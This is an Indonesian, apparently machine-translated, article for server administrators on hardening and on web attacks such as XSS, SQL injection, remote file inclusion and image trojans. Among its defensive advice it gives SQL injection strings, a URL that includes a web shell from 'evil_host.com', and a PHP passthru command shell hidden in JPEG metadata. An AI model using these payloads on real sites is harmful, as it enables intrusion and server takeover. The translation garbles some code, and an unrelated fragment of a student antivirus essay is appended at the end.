Jadi apa yang dilakukan peretas dengan buffer overflow lokal? Anda dapat menimpa alamat pengirim dengan kode berbahaya. Dari jarak jauh ini memungkinkan kode arbitrer untuk dieksekusi pada sistem target, secara lokal, jika program dijalankan sebagai root, itu akan mendapatkan hak administrator sistem. Kode yang menyebabkan buffer overflow dan melakukan tindakan untuk peretas disebut kode shell. Menulis kode shell bukanlah tugas yang mudah dan membutuhkan pengetahuan assembler dari hacker, yang menyiratkan profesionalisme di bidang ini.

Perlindungan terhadap serangan terhadap layanan yang rentan dan server itu sendiri

  • Memperbarui... Penting untuk mempelajari cara memperbarui seluruh sistem dan karena itu dapat
    "membangun dunia dan kernel" untuk * nix, update melalui sistem batch Linux dan dapat menekan tombol Update di Windows Update untuk MS Windows berlisensi. Untuk admin FreeBSD, Anda harus dapat menginstal perangkat lunak menggunakan port. Ini akan membantu Anda berlayar dengan para pengembang, bukan melawan mereka.

    Admin MS Windows perlu membiasakan diri dan sering menggunakan format distribusi MSI, yang sangat direkomendasikan oleh Microsoft dan mendukung pembaruan paket lama dengan yang baru. Apa pun yang Anda lakukan di server Anda, tanyakan pada diri Anda sendiri, jika ada versi baru dari program ini, bagaimana cara lebih mudah untuk memperbaruinya? Anda harus membuat solusi yang Anda kendalikan sepenuhnya, ya ada proyek dengan pengembangan atau tambalan mereka sendiri, tetapi jika pengembangan Anda memerlukan pembekuan aplikasi yang Anda butuhkan pada versi tertentu dan Anda tidak dapat menerapkan tambalan Anda ke sistem baru - solusi seperti itu tidak layak!

    Saya akan membuat penyimpangan liris di sini dan memberi tahu Anda bagaimana saya harus menghancurkan diri saya sendiri. Setelah membaca artikel di internet yang biasanya dimulai seperti ini "download source and put it make install". Jadi, apa selanjutnya? Bagaimana Anda akan menginstal versi baru? Simpan versi lama jadi buat (de | un) instal di dalamnya? Dan di make baru install lagi? Pertanyaan-pertanyaan ini ditanyakan oleh teman saya Dmitry Dubrovin ketika kami mulai menguasai FreeBSD. Saya mulai menyadari bahwa dia benar, dan, setidaknya untuk Free, jalur ini tidak cocok dan, tidak mengikuti jalur pengembang FreeBSD, saya hanya mempersulit diri saya sendiri.

    Sekarang Anda telah menguasai FreeBSD, ketika beberapa perintah mengunduh sumber baru untuk kernel Gratis dan seluruh sistem, kemudian beberapa perintah membuat dunia dan kernel baru, dan kemudian port dan aplikasi dalam sistem diperbarui, Anda mulai untuk memahami kekuatan sistem * nix. Sulit untuk menyampaikan kebanggaan yang Anda rasakan ketika Anda mengupgrade server dengan FreeBSD dari cabang lama ke yang sekarang, membangun kembali dunia sistem, ketika sistem mengkompilasi dirinya sendiri dari sumber baru (sepertinya Munchausen menarik dirinya keluar dari rambut) dan semua yang berfungsi sebelum pemutakhiran juga berfungsi "tanpa file".

    Seperti yang sudah Anda pahami, sangat penting untuk berlangganan surat keamanan dari pengembang perangkat lunak yang mendukung bisnis Anda dan diperbarui secara berkala. Pembaharuan segala sesuatu dan setiap orang harus diasah dan ditempatkan pada jalurnya.

  • Penyetelan keamanan... Sebagian besar sistem operasi server tidak cukup dikonfigurasi secara default untuk beroperasi di lingkungan "kimia" Internet yang keras. Untuk mencegah peretas dari "kecurangan" di server Anda, Anda perlu menyetel keamanannya, yaitu, membaca rekomendasi pabrikan sistem operasi untuk keamanan. Admin sistem * nix dapat memanggil keamanan manusia dan, setelah membaca saran pengembang, membuat dongeng menjadi kenyataan. Tetapi apa pun sistem operasinya, Anda perlu menguji operasi server dan layanan secara menyeluruh setelah penyetelan keamanan.
  • Firewall... Firewall yang dikonfigurasi, yang diperiksa oleh Anda secara pribadi menggunakan pemindai port seperti nmap dan pemindai kerentanan, jika ada output dari program ini, apakah Anda semua mengerti tentang apa ini? Saat mengonfigurasi firewall, ingatlah bahwa ada cara untuk melewati aturannya. Misalnya, ada jaringan lokal yang dilindungi oleh firewall, dengan menetapkan bendera untuk melarang fragmentasi paket, dalam situasi tertentu, Anda dapat mencapai tujuan di jaringan lokal. Atau kesalahan umum dari administrator, kepercayaan yang berlebihan pada paket keluar dari server Anda sendiri.

    Bayangkan situasi nyata, kode musuh mencoba memulai koneksi dengan host master peretas, dan Anda memiliki aturan di firewall "semuanya diizinkan dari saya ke Internet." Saat membuat aturan untuk firewall, Anda harus sepenuhnya memahami seluruh gambaran komunikasi jaringan layanan Anda antara mereka dan klien jarak jauh.

  • Sistem pendeteksi intrusi... Firewall dapat dianggap sebagai dinding batu di dekat kastil ksatria. Didirikan sekali dan Anda duduk di dalam - kering dan nyaman. Tetapi bagaimana jika seseorang sudah menguji kekuatan dinding dari meriam? Mungkin Anda sudah perlu melihat keluar dari kastil dan menindih seseorang? Untuk mengetahui apa yang terjadi di luar tembok kastil, yang di luar, Anda perlu memiliki Intrusion Detection System (IDS) di server. Jika Anda memiliki sistem seperti itu berdasarkan paket yang Anda suka, maka jika seseorang mulai menembak dari meriam nmap, maka Anda akan menyadarinya, dan penyerang juga akan mengetahui "apa yang Anda ketahui".
  • Analisis situasi non-standar... Banyak log pada sistem sering membaca "kesalahan: tidak membuka file / etc / passwd" atau "akses ditolak". Ini adalah lonceng kecil yang memanggil tentang aplikasi yang tidak dikonfigurasi dengan benar yang tidak dapat membaca sesuatu, di suatu tempat, atau mungkin ini bukan lonceng, tetapi alarm yang membunyikan alarm tentang peretas yang setengah jalan.

    Bagaimanapun, admin harus menyadari hal-hal seperti itu. Untuk memudahkan pekerjaan administrator, program telah dibuat yang akan menganalisis log untuk penampilan frasa yang menarik dan mengirim laporan ke administrator melalui surat. Jangan meremehkan kesempatan seperti itu, program seperti itu sebanding dengan penjaga yang memeriksa jalur tepercaya, tetapi apakah semua orang berperilaku seperti yang ditentukan?

  • Hapus versi perangkat lunak... Hapus spanduk dari layanan Anda. Tidak ada spanduk yang Anda tampilkan di situs Anda, tetapi baris-baris yang diberikan program Anda dalam salam saat menghubungkan atau dalam keluaran kesalahan. Tidak perlu menyoroti versi program mereka, peretas mencari versi di Internet untuk program yang tersedia yang mengeksploitasi kerentanan ini atau itu (eksploitasi - eksploit).

    Tidak ada solusi tunggal, misalnya, jika Anda menginstal program tertentu dari port, maka jangan menulis make install clean, jadi tanpa Anda semuanya akan diunduh, dikompilasi, dan diinstal. Lebih baik lakukan pengambilan; membuat ekstrak; kemudian pergi ke subdirektori file dan di sana dalam kode sumber Anda dapat memperbaiki versi program atau menyebarkannya sebagai yang berbeda, dan kemudian hanya membuat instalasi bersih.

    Apache sangat informatif tidak pada tempatnya dan masih bersinar dengan versi sistem, PHP, Perl, OpenSSL. Dinonaktifkan dengan menentukan arahan di httpd.conf ServerSignature Off ServerTokens Prod. Di Internet, Anda dapat menemukan bantuan untuk mengganti spanduk untuk program apa pun. Tujuannya adalah satu - untuk menghilangkan penyerang dari informasi berharga. Melihat daftar layanan Anda yang tersedia dari Internet, tanyakan pada diri Anda apakah itu memberikan informasi yang tidak perlu tentang dirinya sendiri dan informasi yang disimpannya.

    Misalnya, server DNS mengikat dapat memungkinkan "transfer zona" dan komputer Anda dengan IP dan nama domain mereka akan tersedia untuk semua orang, yang buruk. Periksa server Anda sendiri dengan berbagai pemindai dan baca hasilnya dengan cermat. Saat mengganti spanduk program, saya menyarankan Anda untuk memasukkan bukan teks acak, tetapi peringatan tentang tanggung jawab dan bahwa tindakan sedang dicatat. Seperti ada insiden ketika hacker dibebaskan di ruang sidang, seperti di server FTP yang diretas ada tulisan "Selamat datang! Selamat datang!".

  • Aturan minimum yang diperlukan... Minimalkan layanan Internet yang tersedia. Nonaktifkan yang tidak perlu, karena Anda tidak dapat meretas apa yang dinonaktifkan. Kesalahan umum, misalnya, ketika server MySQL dipasangkan dengan Apache pada mesin yang sama dikonfigurasi untuk dapat diakses dari jarak jauh pada port standar 3306. Mengapa? Keluarkan perintah netstat -na | grep DENGARKAN dan beri diri Anda jawaban: apakah Anda tahu program mana yang menggunakan antarmuka mana dan port mana? Apakah Anda mengendalikan situasi? Nah jika demikian.
  • Banyak kata sandi yang kuat dan berbeda... Seringkali dalam video peretasan atau cerita peretas tentang peretasan, frasa "ada baiknya admin memiliki satu kata sandi untuk panel admin, yang juga muncul untuk ssh dan ftp". Saya harap ini bukan tentang Anda. Karenanya aturannya: kata sandi untuk layanan yang berbeda harus berbeda dan setidaknya 16 karakter. Biarkan mereka ditulis di selembar kertas, jika Anda takut lupa (pakar keamanan membunuh saya di tempat ini), tetapi lebih baik daripada penyerang jarak jauh mendekripsi kata sandi Anda dalam beberapa menit, karena panjang kata sandinya kecil dan seperti kata kosa kata diperbolehkan untuk dilakukan.

    Sangat mudah untuk membuat kata sandi yang berbeda untuk layanan yang berbeda jika layanan akan diotorisasi bukan sebagai pengguna sistem di database / etc / passwd, tetapi sebagai yang virtual di database planar atau DBMS mereka sendiri. Jangan simpan sandi di server dalam file password.txt untuk semua sumber daya yang aksesnya Anda, sebagai administrator, miliki.

  • Keterbatasan... Semua layanan Anda di server harus berjalan di bawah akun terbatas yang berbeda dan tidak pernah berjalan di bawah akun root. Percayalah, jika mereka mendapatkan eskalasi hak istimewa dari akun terbatas ke status root (uid = 0, gid = 0), Anda akan diselamatkan oleh tidak adanya lubang yang diketahui di sistem Anda yang diperbarui.

    Omong-omong, banyak admin melupakan hal seperti itu, mengapa, misalnya, akun untuk Apache dan MySQL memiliki akses ke shell! Lagi pula, Anda dapat mematikannya dan menentukan / bin / false alih-alih shell. Sejujurnya, periksa akun program Anda di server pelaporan Anda dan beri tahu saya jika saya salah. Di database SQL Anda, batasi akun dengan hak istimewa minimum yang diperlukan. Jangan berikan hak FILE ketika hanya SELECT yang dipanggil.

  • Semua orang di penjara! Belajar bekerja dengan kotak pasir atau penjara dan menjalankan aplikasi di ruang terisolasi ini, itu akan menyulitkan untuk meretas seluruh server. Jika Anda menggunakan virtualisasi, Anda dapat menyebarkan layanan di berbagai sistem operasi tamu.
  • Pertahanan berlapis. Dimungkinkan untuk melarang sesuatu dengan beberapa cara di tempat yang berbeda - lakukanlah. JANGAN PERNAH berpikir - saya melarangnya di sini, melarang hal-hal yang tidak perlu di sana.

Pelajari lebih lanjut tentang serangan terhadap layanan rentan dan server itu sendiri.

  • Serangan DoS (Denial of Service) - serangan yang bertujuan untuk memalu sumber daya server yang terbatas (saluran Internet, RAM, prosesor, dll., dll.), sehingga server tidak dapat melayani pengguna yang sah. Secara kiasan, bayangkan seorang penyusup menelepon Anda di rumah dan diam di telepon dan begitu seterusnya sepanjang malam. Anda bosan dengan semua ini dan Anda mematikan telepon Anda, dan di pagi hari Anda menemukan bahwa Anda melewatkan panggilan penting dari bos Anda. Berikut adalah analogi kehidupan nyata untuk serangan DoS.

    Dalam kehidupan nyata, DoS sering terlihat seperti ini, karena kesalahan dalam program, penggunaan CPU melonjak dan tetap 100% untuk waktu yang lama, dan penyerang secara berkala menggunakan lubang ini dalam program. Aplikasi yang ditulis dengan tidak benar dapat menghabiskan semua RAM. Atau "bom surat" dalam bentuk file yang sangat terkompresi dalam arsip dengan banyak karakter [spasi], yang akan dibongkar oleh antivirus untuk diperiksa dan file besar yang dibongkar akan mengisi partisi hard disk di server atau / dan menyebabkan server untuk reboot.

    Perlindungan DoS:

    • Memperbarui program yang dimanipulasi untuk serangan DoS
    • Konfigurasikan kuota sumber daya untuk akun yang menjalankan program ini. * sistem nix memungkinkan Anda untuk mengonfigurasi persentase penggunaan prosesor, RAM, jumlah proses yang dihasilkan, file yang terbuka, dll. dll.
    • Atur logging dalam program dan coba temukan penyerang dalang dan blokir dia di firewall.
    • Konfigurasikan program sebagai pengembang, saran guru, menurut artikel di Internet, jika Anda berada dalam situasi seperti itu.
  • DDoS (DoS yang sama, tetapi Anda diserang dari beberapa komputer zombie, di bawah bimbingan
    penyerang). DDoS bersifat merusak dan hanya digunakan oleh pengacau yang memiliki kawanan mesin zombifikasi dan akan meminta uang untuk menghentikan serangan atau merusak bisnis Anda sehingga pengguna, tanpa mencapai server Anda, beralih ke pesaing. Serangan DDoS tidak digunakan oleh peretas yang tujuannya adalah untuk meretas server Anda secara cerdas, ya, server Anda adalah "misteri" yang ingin mereka "urai".

    Bagaimana cara melindungi dari DDoS? Jika Anda mengandalkan upaya dan sumber daya Anda sendiri, maka Anda dapat, dengan mengotomatiskan pekerjaan dengan skrip, mengekstrak alamat IP dari berbagai log dan memasukkannya ke dalam aturan firewall yang melarang. Misalnya, penulis artikel "Apakah ada kehidupan di bawah DDoS?" Di majalah Hacker. Banyak artikel tentang cara mengkonfigurasinya untuk meminimalkan kerusakan DDoS.

    Perlindungan DDoS:

    • Jika DDoS diarahkan ke suatu aplikasi, coba temukan di log perbedaan antara penyerang dan pengguna yang sah, dan dengan mengotomatiskannya dengan skrip, masukkan ke dalam aturan firewall di tolak
    • Jika DDoS diarahkan ke sistem (misalnya, serangan melalui protokol ICMP), menggunakan skrip untuk mengotomatiskannya, masukkan ke dalam aturan firewall dalam penolakan
    • Konfigurasikan kuota sumber daya untuk akun yang menjalankan program ini. * sistem nix memungkinkan Anda untuk mengonfigurasi persentase penggunaan prosesor, RAM, jumlah proses yang dihasilkan, file yang terbuka, dll., dll.
    • Konfigurasikan program sebagai pengembang, saran guru, menurut artikel di Internet, jika Anda berada dalam situasi seperti itu
    • Silakan hubungi penyedia upline Anda untuk membantu Anda dengan cara apa pun yang dia bisa. Tulis keluhan ke [dilindungi email] host_nets_from_attacked.domain. Ini akan membantu menghancurkan sebagian jaringan penyerang, membiarkannya menderita kerusakan, itu menghabiskan uangnya. Anda akan mengalami kepuasan moral.
    • Kenali mod_security untuk Apache, yang merupakan alat hebat untuk membantu Anda dalam beberapa situasi.
  • Serangan bruteforce kata sandi. Di sini lubang-lubang di program tidak bisa disalahkan, mereka hanya dengan kasar memilih sepasang nama pengguna / kata sandi. Siapa pun yang meninggalkan server dengan konfigurasi ssh, tetapi lupa membatasi akses ssh dari IP tertentu dan dengan login tertentu (perintah dalam ssh_config AllowUser), pasti telah melihat upaya untuk memaksa kata sandi masha di log: password_mash.

    Perlindungan bruteforce kata sandi:

    • Batasi jumlah upaya login / kata sandi yang gagal
    • Jika aplikasi memungkinkan, maka konfigurasikan peningkatan waktu sebelum upaya login / kata sandi baru.
    • Jika aplikasi harus bekerja lingkaran sempit orang, buat aturan seperti itu dan batasi mereka

Serang melalui konten layanan dinamis

Jenis serangan ini sering terjadi pada bundel Apache + (PHP | PERL) + (MySQL | PostgreSQL) untuk dunia * nix dan IIS + ASP + Microsoft SQL Server untuk dunia MS Windows menggunakan browser sederhana, tetapi ini hanya kasus khusus, yang hanya lebih sering digunakan karena popularitas web. Dalam bundel ini, bahasa pemrogramannya adalah ASP, PHP, Perl, SQL, sehingga akan sering digunakan oleh peretas untuk menyusun konstruksi destruktif mereka.

TAPI yang paling penting adalah memahami bahwa ligamen seperti itu layanan + konten dinamis di atasnya ada banyak bahasa pemrograman dan oleh karena itu semuanya berada di bawah kendali peretas. Misalnya, ini adalah daftar yang tidak lengkap:

  • Server web + skrip CGI
  • Bundel kuno yang sekarang tidak digunakan - skrip Apache + PHF (yaitu P H F)
  • Server Aplikasi IIS + ColdFusion
  • Mekanisme SSI (Server Side Termasuk)

Selanjutnya, kita akan berbicara sebagian besar tentang peretasan web, tetapi jangan lupa bahwa semua yang dijelaskan di bawah ini juga berlaku untuk paket layanan + konten dinamis lainnya. Kata-katanya berbeda, tetapi esensinya sama. Hari ini peretas menyerang web dengan browser, besok dengan klien R melawan layanan Z. Server web, yang terhubung dengan database dan berbagai bahasa pemrograman, telah menjadi platform untuk serangan semacam ini.

Inti dari semua serangan semacam ini bermuara pada mencoba menggunakan browser untuk memindai situs untuk kesalahan dalam skrip yang menyajikan konten dinamis situs.

Oleh karena itu kesimpulannya - meretas situs melalui serangan di web, yang hanya berisi halaman html statis yang hanya terhubung satu sama lain, adalah TIDAK MUNGKIN. Serangan melalui situs web Anda terjadi ketika orang menginginkan lebih banyak interaktivitas dan menambahkannya melalui bahasa pemrograman dan basis data.

Peretas yang menjelajahi situs, memberi perhatian khusus pada skrip yang melewati parameter apa pun. Tetapi bagaimana jika penulis skrip tidak memeriksa apa yang sebenarnya dilewatkan sebagai nilai parameter?

Solusi umum untuk admin terhadap serangan terhadap konten dinamis layanan (Situs web, sebagai kasus khusus)

  • Memperbarui... Kami sudah membicarakan ini, tetapi jika Anda menggunakan pengembangan pihak ketiga (mesin forum, galeri, obrolan, dll.), maka terima pesan tentang kerentanan dan lubang tambalan. Pendapat peretas adalah bahwa jika portal bekerja dengan keuangan dan omset mereka, maka pada portal seperti itu tidak diinginkan untuk memiliki pengembangan siapa pun, kecuali untuk mereka sendiri. Tentu saja, diasumsikan bahwa pengembangan mesin mereka sendiri untuk situs ini ditulis oleh pembuat kode yang tahu cara memprogram dengan aman dan memiliki pemahaman tentang ancaman di Internet.
  • Jadilah non-standar... Di banyak utilitas peretas, basis data kerentanan, jalur forum /, galeri /, gambar / sering muncul. Sangat nyaman! Tahu admin, setengah dari mereka akan mencukur dan meludahi situs Anda ketika situs Anda tidak terletak di / usr / www, dan area admin Anda bukan site.com/admin. Intinya adalah, jika Anda tidak standar, maka ini adalah tongkat tambahan di roda peretas yang menyerang situs Anda. Dia harus menambahkan / memperbaiki ke basis / skrip manual. Apakah seorang hacker selalu bisa atau ingin? Peretas script kidis muda pasti akan ketakutan. Berikut adalah tip keamanan PHP misalnya

    # Jadikan kode PHP terlihat seperti jenis kode lainnya
    Aplikasi AddType / x-httpd-php .asp .py .pl
    # Jadikan kode PHP terlihat seperti kode jenis yang tidak diketahui
    Aplikasi AddType / x-httpd-php .bop .foo .133t
    # Membuat kode PHP terlihat seperti html
    Aplikasi AddType / x-httpd-php .html .htm

    Bentuk keamanan untuk PHP melalui kebingungan ini memiliki beberapa kelemahan dengan biaya rendah. Peretas itu sendiri, menjelaskan peretasan mereka, menulis bahwa mereka mengunduh perangkat lunak yang sama yang terletak di server Anda dari situs pengembang dan melihat dengan nama tabel default / jalur / mesin ini atau itu yang berfungsi. Arti umum menjadi non-standar adalah menunda proses peretasan sehingga peretas tidak berhasil dalam "blitzkrieg", dan semakin banyak ia menarik, semakin besar kemungkinan untuk terdeteksi.

  • Hapus versi mesin dan skrip di situs... Ini adalah informasi berharga yang harus dihilangkan oleh penyerang, mengetahui versi yang mereka cari untuk solusi peretasan yang sudah jadi. Pastikan skrip Anda tidak menampilkan informasi yang berguna tentang kesalahan, seperti: jalur ke skrip tempat kesalahan terjadi (masalah "perluasan jalur") dan keluaran kesalahan itu sendiri.
  • Pikirkan tentang membutuhkan .htaccess... Kehadiran file .htaccess berarti Anda dapat mengganti opsi yang diatur di konfigurasi Apache utama, percayalah, peretas akan melakukannya. Jika Anda menonaktifkan penggunaan .htaccess dengan arahan "AllowOverride None", maka Anda akan mendapatkan manfaat kinerja untuk Apache, karena dia tidak akan melihat semua direktori di jalur ke halaman web dengan setiap permintaan dan meningkatkan keamanan server web Apache.

Pelajari lebih lanjut tentang serangan pada konten dinamis (Situs web sebagai kasus khusus)

  • XSS (Skrip Lintas Situs).
    Skrip lintas situs disebut XSS, bukan CSS, karena CSS adalah akronim awal untuk Cascading Style Sheets. Serangan XSS tidak ditujukan terhadap server, tetapi terhadap pengguna server tersebut. Tapi admin tidak perlu bahagia! Serangan XSS terlihat seperti ini, situs memiliki bidang yang dapat diedit di halaman web atau parameter skrip yang tidak difilter pada konstruksi seperti<, >, javascript.

    Peretas menambahkan kode bahasa pemrograman sisi klien, biasanya Java dan VBScript, ke bidang yang dapat diedit, dan kode ini menjadi bagian dari halaman HTML. Saat pengguna mengunjungi halaman seperti itu, browser mereka mem-parsing halaman dan mengeksekusi kode ini.
    Apa yang dilakukan peretas dengan XSS?

    • Pencurian cookie (cookie, roti) - file teks ini menyimpan informasi bahwa server "menempatkan" pengguna untuk identifikasi selanjutnya. Dalam contoh, jika Anda membuat file test.html dengan konten seperti itu (tulis sendiri), maka ketika Anda menjalankannya di browser, itu akan menampilkan XSS.
      Admin yang terhormat, saya mengalami kesalahan saat mengunjungi situs
      Membantu

      Tetapi Anda dapat menulis skrip di Jawa dan lebih serius... Biasanya, skrip semacam itu ditulis ke email web admin dan, menggunakan rekayasa sosial, mencoba membuatnya membaca pesan untuk mendapatkan cookie-nya.

      Jika cookie tidak mengikat ke alamat IP dan tindakan tambahan perlindungan, kemudian ganti cookie mereka dengan cookie administrator dan coba masuk ke panel admin, yang tidak memeriksa nama pengguna dan kata sandi dan mengidentifikasi orang hanya dengan cookie.

    • Deface situs (deface - penggantian halaman awal situs, paling sering index.html)
    • Trojanisasi pengguna jarak jauh. Eksploitasi baru dipilih untuk browser pengguna dan ketika mereka memasuki halaman yang rentan, upaya dilakukan untuk menginfeksi komputer dengan Trojan. Jika pengguna memiliki antivirus dengan database baru yang diinstal, ia akan menunjukkan munculnya Trojan pada sistem. Dan situs Anda akan jatuh di mata pengguna, mungkin dia tidak akan datang kepada Anda lagi.
    • DoS. Pada jumlah yang besar pengunjung, skrip tambahan akan meminta halaman lain dari server Anda atau dari yang lain, seseorang mungkin memiliki DoS.

    Larutan:

    • Untuk memblokir penulisan tag html ke database dari kolom input informasi, gunakan konstruksi seperti htmlspecialchars untuk PHP, yang akan menggantikan< на <, >di>, & di & dan seterusnya
      Contoh,

      $ komentar = htmlspecialchars ($ komentar, ENT_QUOTES);
      $ query = "masukkan ke buku tamu
      (nama, lokasi, email, url, komentar) nilai
      ("$ nama", "$ lokasi", "$ email", "$ url", "$ komentar" ";
      mysql_query ($ query) atau mati (mysql_error());

    • Periksa dan filter dalam skrip Anda semua parameter yang dimasukkan pengguna dan yang diteruskan ke skrip melalui bilah alamat. Pelajari cara menggunakan ekspresi reguler dengan benar untuk mengurai data yang masuk. Temukan materi yang mengajarkan teknik pengkodean yang aman untuk bahasa pemrograman Anda.
    • Jika Anda ingin menggunakan teknologi cookie di situs Anda, harap baca metode aman bekerja dengan cookie. Batasi tindakan mereka dalam waktu dan berdasarkan alamat IP.
    • Sebagai admin, berhati-hatilah saat dibiakkan oleh rekayasa sosial. Jangan lupa tentang keamanan komputer pribadi di komputer klien Anda.
  • injeksi SQL. injeksi SQL.
    Penyakit ini berarti bahwa parameter yang tidak dicentang diganti ke dalam kueri SQL yang muncul di skrip. Peretas menemukan skrip injeksi SQL secara sederhana, tanda kutip site.com/view.php?id=1 "disediakan ke nilai parameter" atau parameter numerik diubah sehingga site.com/view.php?id=2-1.

    Jika tanda kutip yang disisipkan menyebabkan "kesalahan" (sekumpulan pesan bahwa permintaan ini dan itu tidak dieksekusi dalam skrip ini dan itu di sepanjang jalur ini), maka skrip tersebut adalah kandidat untuk memompanya lebih lanjut. Penjahat dunia maya sering menggunakan peretasan Google, meminta mesin pencari dengan pertanyaan serupa "situs: www.victim.ru Warning."

    Kode yang tidak memeriksa nilainya dan mengalami injeksi SQL

    $id = $_REQUEST ["id"];
    $ result = mysql_query("PILIH judul, teks, datenews, penulis FROM` news` WHERE `id` =" $id "");

    Sekarang bayangkan bahwa alih-alih angka, Anda akan diganti "-1 union pilih null / *" (tanpa tanda kutip) dan kemudian kueri Anda akan berubah

    SELECT title, text, datenews, author FROM `news` WHERE` id` = "- 1 union pilih null / *"

    Artinya, peretas ingin, selain permintaan Anda, permintaannya, digabungkan dengan permintaan Anda menggunakan arahan serikat pekerja. Dan kemudian peretas akan mencoba membuat kueri lain dan, mengingat kekuatan bahasa SQL, ini bukan pertanda baik bagi administrator. Dari deface (deface - mengganti halaman beranda situs) hingga mendapatkan hak root di server Anda. Seorang hacker juga dapat melakukan serangan DoS berkat injeksi SQL: site.com/getnews.php?id=BENCHMARK(10000000,BENCHMARK(10000000, md5 (current_date))) beberapa permintaan tersebut dan server pada CPU 100% memuat untuk waktu yang lama.

    Perlindungan injeksi SQL:

    • Manfaatkan alat SQL Server secara ekstensif seperti tampilan dan prosedur tersimpan. Ini akan membatasi akses tidak sah ke database.
    • Sebelum meneruskan parameter ke permintaan, itu harus diperiksa untuk jenisnya (untuk PHP - is_bool(), is_float(), is_int(), is_string(), is_object(), is_array() dan is_integer()) dan, di setidaknya, kutipan menggunakan konstruksi seperti addlashes untuk PHP.
    • Semua skrip bekerja dengan database dari beberapa akun database, hapus dari akun ini semua hak istimewa yang tidak diperlukan untuk bekerja. Seringkali peretas menggunakan perintah MySQL (MySQL diambil sebagai contoh, ini berlaku untuk semua server SQL) "LOAD DATA INFILE" untuk membaca file yang mereka butuhkan dari server dan akun yang dapat dibaca di mana MySQL sedang berjalan. Oleh karena itu kesimpulannya, nonaktifkan hak istimewa yang tidak perlu untuk skrip Anda, seperti FILE, yang diperlukan untuk menggunakan perintah LOAD DATA INFILE. Prinsip "dasar minimum" harus diambil sebagai dasar.
    • sistemik Akun, dari mana server SQL berjalan, seharusnya tidak memiliki akses ke halaman situs dan file sistem server.
  • Menghubungkan file. Sertakan berkas. Katakanlah ada halaman site.com/getnews.php?file=190607, tetapi penulis skrip, menggunakan include, menyertakan halaman, tanpa pemeriksaan.

    $file = $_REQUEST["file"];
    sertakan ($file. ".html");

    Peretas akan mengganti evil_host.com/shell.php alih-alih 190607 dan kemudian seluruh bilah alamat peramban peretas akan terlihat seperti site.com/postnews.php?file=evil_host.com/shell.php dan peretas akan memilikinya memiliki shell web di situs Anda dengan hak yang dimiliki Apache.

    Perlindungan koneksi file:

    • Periksa dan filter dalam skrip Anda semua parameter yang dimasukkan pengguna dan yang diteruskan ke skrip melalui bilah alamat. Temukan materi yang mengajarkan teknik pengkodean aman untuk bahasa pemrograman Anda.
    • Peretas sangat menyukainya ketika bahasa pemrograman di situs memungkinkan Anda menjalankan perintah sistem. Oleh karena itu, Anda perlu melarang pemanggilan fungsi tersebut dalam bahasa pemrograman Anda, jika, tentu saja, memungkinkan. Misalnya, dalam pengaturan PHP dimungkinkan untuk menentukan daftar fungsi "terlarang" menggunakan disable_functions di php.ini.
  • Gambar Trojan
    Jika Anda memiliki kemampuan untuk mengunggah file ke server di situs, bersiaplah untuk mengunggah, misalnya, gambar avatar. Dalam gambar dalam format JPEG ada konsep metadata (ingat di mana kamera menulis informasi saat memotret bingkai) dan metadata ini akan ditulis

    "; passthru ($ _ GET [" cmd "]); echo""; ?>

    gambar akan diganti namanya avatara.jpg.php, untuk melewati sebagian besar pemeriksaan ekstensi, dan akan menggunakan site.com/upload_images/avatara.jpg.php?cmd=server_commands

    Perlindungan Trojan:

    • Periksa ekstensi file dengan benar. Bahkan jika Anda memproses file yang diizinkan dengan benar, bersiaplah bahwa gambar dari jpg ke php akan diganti namanya menggunakan kerentanan lain di situs Anda. Periksa metadata dalam gambar menggunakan fungsi seperti exif_read_data () di PHP.
    • Melarang melalui server web Anda eksekusi bahasa pemrograman dalam katalog dengan gambar. Untuk melakukan ini, lihat di konfigurasi Apache untuk baris seperti "AddType application / x-httpd-", yang mengaitkan bahasa pemrograman dengan ekstensi file dan melarang eksekusi mereka di direktori dengan gambar. Untuk Apache, larangan eksekusi file bahasa PHP akan menjadi konstruksi


      Perintah tolak, izinkan
      Tolak dari semua

    • Untuk bahasa pemrograman Anda, temukan materi yang mengajarkan teknik pemrograman yang aman untuk memproses gambar dan mengunggahnya dengan benar ke server.

Terima kasih pribadi:

  • teman Alexander Pupyshev alias lynx untuk kritik dan saran
  • situs web antichat.ru/
  • situs web xakep.ru/
  • buku oleh Michael Eben, Brian Tyman. Administrasi FreeBSD: Seni Menyeimbangkan
  • buku oleh Joel Skembray, Stuart McClar, George Kurtz. Rahasia peretas: Keamanan jaringan - solusi siap pakai. Edisi kedua

Sumber informasi lain tentang perlindungan:

  • Halaman keamanan manual FreeBSD berisi masalah keamanan umum dan praktik administrasi yang baik.
  • Berlangganan ke milis freebsd-security @ freebsd.org. Untuk melakukan ini, kirim email ke [email protected] dengan teks berlangganan freebsd-security di badan pesan. Di milis inilah masalah keamanan yang paling mendesak dibahas.
  • Halaman Informasi Keamanan FreeBSD freebsd.org/security/
  • Dokumen Petunjuk Keamanan FreeBSD
  • Situs web CERT.org berisi informasi tentang kerentanan dalam perlindungan semua sistem operasi.
  • Firewall & Keamanan Internet oleh William R. Cheswick dan Steven M. Bellowin
  • Membangun Firewall Internet (Edisi ke-2) oleh Brent Chapman dan Elizabeth Zwicky

Hasil:
Saya harap artikel membantu Anda melihat semua masalah bersama, sekarang admin perlu membaca tentang keamanan komputer, database, server web, bahasa pemrograman dari sumber tambahan. Menyimpulkan artikel secara singkat, Anda perlu mengetahui berita tentang rilis masalah keamanan, memperbarui dan memeriksa semua data input untuk kebenaran dalam perkembangan Anda.
Semoga kekuatan menyertai Anda!

Institut Energi Universitas Negeri Chita Fakultas Ekonomi dan Informatika Departemen Informatika dan Matematika Terapan Abstrak tentang subjek: Pengguna PC dengan topik: Perangkat lunak antivirus untuk server Dilakukan oleh: Seni. gr. PI-07-1 Zlova V.V. Diperiksa: Art. Putaran. departemen PIMMonich I.P. Chita, 2007 Isi

Pengantar. 3

1 File server sebagai salah satu sumber penyebaran virus. 5

2 Perangkat lunak antivirus untuk server LAN. 5

3 Perangkat lunak antivirus untuk server email. delapan

4. Antivirus Kaspersky. sebelas

Kesimpulan. 17

Daftar literatur yang digunakan .. 18

pengantar Virus komputer adalah salah satu ancaman paling berbahaya terhadap keamanan informasi saat ini. Virus komputer adalah program yang ditulis khusus yang dapat secara spontan menempel pada program lain, membuat salinan dirinya sendiri dan memasukkannya ke dalam file, area sistem komputer dan jaringan komputer untuk mengganggu pengoperasian program, merusak file dan direktori, dan membuat segala macam gangguan pada komputer.

